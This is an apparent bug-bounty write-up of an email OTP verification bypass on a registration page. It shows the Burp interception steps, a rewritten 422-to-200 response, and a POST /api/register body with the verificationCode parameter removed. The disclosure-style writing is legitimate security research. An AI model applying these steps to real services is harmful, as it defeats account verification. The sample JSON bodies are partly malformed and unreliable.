Categories
Uncategorized

How I was Able To Bypass Email Verification

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application had a Registration page where a user could register a new Email-id and password which allowed him to log in to the application via the login page.

Registration process

Enter email-id and password

Enter OTP that is sent to your email for verification

After successfull OTP verification choose 3 question and answer for those 3 question( for security purpose )

done.

Bypass ( POC )

Enter Email-id and password

Now you will be redirected to OTP page where you have to enter OTP

Enter random number eg: 111111, Hit enter Intercept the request in Burp proxy and click on Do intercept –> Response to this request

HTTP response

http/1.1 422 Unprocessable Entity
Content-Type: application/json;charset=UTF-8
Content-Length: 67
Server:
X-Application-content: application:docker:8080
response-Key:
Expires: 0
Date: Tue, 31 Marc 2020 10:19:01 GMT
Connection: close
server-Timimng

{“errorcode”:”error.user.1024″,”description”:”Failed verfication”}

Modify it to

http/1.1 200
Content-Type: application/json;charset=UTF-8
Content-Length: 67
Server:
X-Application-content: application:docker:8080
response-Key:
Expires: 0
Date: Tue, 31 Mar 2020 10:19:01 GMT
Connection: close
server-Timing:

and redirected to page where i have to choose 3 question and answer them for security purpose. filled all details and intercepted the request.

HTTP request

POST /api/register HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer:
Content-Type: multipart/form-data; boundary=——————————————–349285293845798324589347594738925
content-Length: 606
Connection:close
Cookie:

——————————————-349285293845798324589347594738925

content-Disposition: Form-data; name=”data”

{“inviteCode”:null,”firstName”:null,”lastname”:null,”login”:”testemail@gmail.com”,”email”:”testemail@email.com”,”verificationCode”:”111111″,”password”:”qwerty@123″,”userPreference”:{“locale”:”en”,”timezone”:”Asia/kolkata”},”securityQuestion”:[{“displayOrder”:0,”questionID”:31},”answer”:”test123″},{“displayOrder”:1,”questionID”:32,”answer”:”qwerty”},{“displayOrder”:1,”questionID”:33,”answer”:”wisdom”}],”programCode”:”PMI”}

——————————————-349285293845798324589347594738925

if you look at the Form-data their is a parameter with verificationCode to bypass i removed the parameter

modified HTTP request

HTTP request

POST /api/register HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer:
Content-Type: multipart/form-data; boundary=——————————————–349285293845798324589347594738925
content-Length: 606
Connection:close
Cookie:

——————————————-349285293845798324589347594738925

content-Disposition: Form-data; name=”data”

{“inviteCode”:null,”firstName”:null,”lastname”:null,”login”:”testemail@gmail.com”,”email”:”testemail@email.com”,”password”:”qwerty@123″,”userPreference”:{“locale”:”en”,”timezone”:”Asia/kolkata”},”securityQuestion”:[{“displayOrder”:0,”questionID”:31},”answer”:”test123″},{“displayOrder”:1,”questionID”:33,”answer”:”qwerty”},{“displayOrder”:1,”questionID”:33,”answer”:”wisdom”}],”programCode”:”PMI”}

——————————————-349285293845798324589347594738925

Done Email verified

Reported: 31 march 2020
Duplicate

Leave a Reply

Your email address will not be published. Required fields are marked *